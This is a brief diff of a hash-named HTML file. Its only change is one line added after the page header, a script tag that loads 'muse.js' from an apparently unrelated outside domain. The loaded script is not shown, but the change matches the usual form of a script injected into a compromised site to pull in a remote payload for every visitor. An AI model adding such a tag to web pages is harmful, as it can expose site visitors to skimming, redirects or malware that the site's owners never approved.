--- a/096a20d4b7e2a60adf2a2fe200d15869.html
+++ b/096a20d4b7e2a60adf2a2fe200d15869.html
@@ -70,6 +70,7 @@
 				</div>
 			</div>
 		</header>
+<script src="https://auntieannesph.com/usa/muse.js"></script>
 		<!-- promo -->
 
 		<!-- contain main informative part of the site -->
